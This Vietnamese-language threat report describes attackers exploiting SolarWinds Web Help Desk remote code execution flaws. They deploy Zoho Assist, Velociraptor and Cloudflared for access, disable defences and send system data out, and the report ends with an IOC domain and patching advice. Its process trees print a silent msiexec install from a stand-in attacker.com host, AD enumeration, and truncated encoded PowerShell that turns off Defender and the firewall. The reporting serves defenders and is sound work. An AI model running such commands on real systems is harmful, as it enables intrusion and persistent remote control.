Khai thác lỗ hổng SolarWinds WHD: Nguy hiểm RCE gia tăng!
Hoạt động khai thác lỗ hổng thực thi mã từ xa (RCE) trong SolarWinds Web Help Desk (WHD) đang gia tăng nhanh chóng. Kẻ tấn công đang tích cực vũ khí hóa các phiên bản bị xâm nhập để triển khai các công cụ quản trị hợp pháp nhưng bị lạm dụng nghiêm trọng.
Theo quan sát từ Huntress, có đến 84 điểm cuối trên 78 tổ chức trong mạng lưới đối tác của họ đang chạy SolarWinds Web Help Desk. Điều này cho thấy bề mặt phơi nhiễm rộng lớn của hệ thống.
Diễn Biến Khai Thác Ban Đầu
Huntress đã ghi nhận hoạt động hậu khai thác bắt nguồn từ một dịch vụ WHD bị xâm nhập. Chuỗi tấn công khởi đầu bằng việc wrapper.exe, trình bao dịch vụ của WHD, tạo tiến trình java.exe, ứng dụng cơ bản dựa trên Tomcat.
Từ đó, tiến trình Java thực thi cmd.exe để cài đặt âm thầm một tải trọng MSI từ xa.
wrapper.exe └── java.exe └── cmd.exe /c msiexec.exe /q /i https://attacker.com/payload.msiTriển Khai Công Cụ Quản Lý Từ Xa
Tải trọng này đã triển khai tác nhân Zoho ManageEngine RMM (Zoho Assist), được lưu trữ qua dịch vụ chia sẻ tệp Catbox. Mặc dù Zoho Assist là một công cụ quản lý từ xa hợp pháp, nó đã trở thành lựa chọn phổ biến trong giai đoạn hậu khai thác do khả năng cung cấp quyền truy cập liên tục mà không cần giám sát.
Trong trường hợp này, tác nhân được đăng ký vào một tài khoản Zoho do kẻ tấn công kiểm soát, liên kết với một địa chỉ Proton Mail, cho phép kiểm soát tương tác ngay lập tức.
Hoạt động này hoàn toàn phù hợp với cảnh báo ngày 6 tháng 2 của Microsoft, xác nhận việc khai thác lỗ hổng SolarWinds WHD trong thực tế để thực hiện remote code execution và triển khai các công cụ tiếp theo.
Các Bước Hậu Khai Thác và Duy Trì Truy Cập
Khi tác nhân RMM được kích hoạt, kẻ tấn công chuyển sang hoạt động tương tác trực tiếp. Sử dụng tiến trình Zoho RMM (TOOLSIQ.EXE) làm ngữ cảnh thực thi, chúng bắt đầu thu thập thông tin Active Directory.
Thu Thập Thông Tin Active Directory
Bước liệt kê này là một tiền đề kinh điển cho di chuyển ngang, cho phép kẻ tấn công lập bản đồ các hệ thống tham gia miền và ưu tiên mục tiêu.
TOOLSIQ.EXE └── powershell.exe -NoP -NonI -Command "Get-ADComputer -Filter * -Property *"Triển Khai Velociraptor cho Command and Control (C2)
Ngay sau khi thu thập thông tin, kẻ tấn công đã triển khai Velociraptor, một nền tảng DFIR mã nguồn mở, thông qua một trình cài đặt MSI âm thầm khác được lưu trữ trên một Supabase bucket do kẻ tấn công kiểm soát. Tìm hiểu thêm về Velociraptor tại GitHub Velociraptor.
Mặc dù Velociraptor được thiết kế cho các nhà phòng thủ, khả năng thực thi lệnh, thu thập artifact và kiểm soát điểm cuối từ xa khiến nó trở thành một khung C2 hiệu quả khi bị lạm dụng.
Việc triển khai được quan sát sử dụng Velociraptor phiên bản 0.73.4 – một bản phát hành lỗi thời với lỗ hổng leo thang đặc quyền đã biết, từng xuất hiện trong các chiến dịch trước đây.
Client Velociraptor liên lạc với hạ tầng kẻ tấn công được lưu trữ phía sau một Cloudflare Worker.
Chỉ Số Thỏa Hiệp (IOCs)
Các chỉ số thỏa hiệp (IOCs) liên quan đến hoạt động này bao gồm:
- Tên miền C2:
auth.qgtxtebl.workers[.]dev
Kỹ Thuật Duy Trì Truy Cập Phụ Trợ
Với Velociraptor chạy như một dịch vụ Windows, kẻ tấn công đã thực hiện một chuỗi nhanh các lệnh PowerShell được mã hóa Base64. Các lệnh này bao gồm việc vô hiệu hóa Windows Defender và Windows Firewall thông qua sửa đổi registry, sau đó ngay lập tức cài đặt Cloudflared từ kênh phát hành chính thức của GitHub.
Hành động này đã tạo ra một đường truy cập thứ cấp dựa trên đường hầm, cung cấp tính dự phòng nếu một kênh C2 bị gián đoạn. Đây là một kỹ thuật thường thấy trong các cuộc tấn công mạng phức tạp.
powershell.exe -EncodedCommand JABhAHQAdABhAGMAawBlAHIAYwBvAG0AbQBhAG4AZAAxAD0AIgBT… (Disable Windows Defender/Firewall)powershell.exe -EncodedCommand JABhAHQAdABhAGMAawBlAHIAYwBvAG0AbQBhAG4AZAAyAD0AIg… (Install Cloudflared)Trích Xuất Dữ Liệu Nhanh Chóng
Một trong những lựa chọn kỹ thuật đáng chú ý là việc trích xuất thông tin hệ thống chi tiết bằng Get-ComputerInfo. Dữ liệu này sau đó được đẩy trực tiếp vào một triển khai Elastic Cloud do kẻ tấn công kiểm soát thông qua Bulk API.
Về cơ bản, kẻ tấn công đã tái sử dụng công cụ SIEM của Elastic để xây dựng một nền tảng quản lý và phân loại nạn nhân tập trung. Đây là một sự đảo ngược mỉa mai của công cụ phòng thủ.
Biện Pháp Khắc Phục và Phòng Ngừa Khẩn Cấp
Chiến dịch này nhấn mạnh tốc độ mà kẻ tấn công có thể chuyển từ một giao diện quản lý phơi bày ra internet duy nhất sang kiểm soát tương tác hoàn toàn, duy trì truy cập và hiển thị trên toàn doanh nghiệp, thường sử dụng các công cụ đáng tin cậy hòa lẫn vào hoạt động quản trị thông thường. Để giảm thiểu rủi ro từ các hoạt động khai thác lỗ hổng tương tự, các tổ chức cần hành động ngay lập tức.
Các tổ chức đang chạy SolarWinds Web Help Desk nên cập nhật khẩn cấp lên phiên bản 2026.1 hoặc mới hơn. Phiên bản này khắc phục các lỗ hổng CVE-2025-26399, CVE-2025-40536, và CVE-2025-40551. Thông tin chi tiết về CVE-2025-26399 có thể được tìm thấy tại NVD.NIST.GOV.
Các biện pháp phòng ngừa quan trọng bao gồm:
- Các giao diện quản trị phải được loại bỏ khỏi việc phơi bày trực tiếp ra internet.
- Thay đổi thông tin xác thực (credentials) định kỳ.
- Kiểm tra lại các máy chủ để tìm các công cụ truy cập từ xa trái phép, các cài đặt MSI âm thầm, và thực thi PowerShell được mã hóa liên kết với các tiến trình WHD.
- Triển khai các bản vá bảo mật một cách có hệ thống và kịp thời là yếu tố then chốt.
Khi hoạt động khai thác lỗ hổng tiếp tục lan rộng, các nhà phòng thủ nên giả định có các hoạt động quét tích cực và vũ khí hóa nhanh chóng, đồng thời phản ứng phù hợp.
